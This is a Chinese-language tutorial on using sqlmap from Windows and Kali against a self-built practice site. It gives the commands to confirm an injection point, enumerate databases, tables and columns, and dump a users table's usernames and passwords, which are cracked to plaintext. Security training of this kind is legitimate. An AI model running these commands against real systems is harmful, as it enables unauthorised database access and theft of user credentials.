23_windows 使用sqlmap、kali使用sqlmap，SQL注入、sqlmap自动注入

sqlmap介绍

安装sqlmap

安装python环境

链接：https://pan.baidu.com/s/16QhhYCppSvuUikhKiOHNgg?pwd=9LJY 
提取码：9LJY

 

C:\Users\leyilea> python // 测试python能不能用

>>> exit() // 退出

测试sqlmap是否可用

kali中运行sqlmap（两者不同区别是，win10里是脚本的方式运行，kill里是变成了命令方式运行）

使用sqlmap获取数据

1、测试注入点

windows中：

kali中：自己替换自己搭建的靶场IP地址，注意，地址里要有参数，比如id

┌──(root㉿kali)-[~/桌面]
└─# sqlmap -u 'http://10.211.55.3/news/show.php?id=46' -p id --batch// --batch  默认确定，用上这个就不用自己每次都手动按确认了

 出现这个说明有注入漏洞

2、获取所有数据库

┌──(root㉿kali)-[~/桌面]
└─# sqlmap -u 'http://10.211.55.3/news/show.php?id=46' -p id --batch  --dbs

 这是获取到的所有数据库，共10个

3、获取所有数据表

获取所有数据表，这个命令执行，所有数据表就太多了，所以我选择获取指定库中的数据表

┌──(root㉿kali)-[~/桌面]
└─# sqlmap -u 'http://10.211.55.3/news/show.php?id=46' -p id --batch  --tables

获取指定库中的数据表

┌──(root㉿kali)-[~/桌面]
└─# sqlmap -u 'http://10.211.55.3/news/show.php?id=46' -p id --batch  -D news --tables
// -D :指定库

 这是获取指定库（news）中的数据表，有8个数据表

4、获取所有字段

获取所有字段名，这个执行也是很久很久

┌──(root㉿kali)-[~/桌面]
└─# sqlmap -u 'http://10.211.55.3/news/show.php?id=46' -p id --batch  --columns

获取指定库（news），指定表（news_users）中的字段名

┌──(root㉿kali)-[~/桌面]
└─# sqlmap -u 'http://10.211.55.3/news/show.php?id=46' -p id --batch  -D news -T news_users --columns
// -T ：指定表

 这是获取到指定库（news），指定表（news_users）中的字段名

5、获取所有数据

┌──(root㉿kali)-[~/桌面]
└─# sqlmap -u 'http://10.211.55.3/news/show.php?id=46' -p id --batch  -D news -T news_users -C 'userid,username,password'  --dump
// -T ：指定表

结果出来了，会发现这里的哈希值会自动的变成了明文，省得你去自己去找了是吧

举例：跑别的靶场也是如此，记得要加参数（?id=）

 总结：

先看看网页有无注入点，例如：可先手工或直接上工具

sql注入的防御

写在了另一篇文章里

http://t.csdnimg.cn/On36j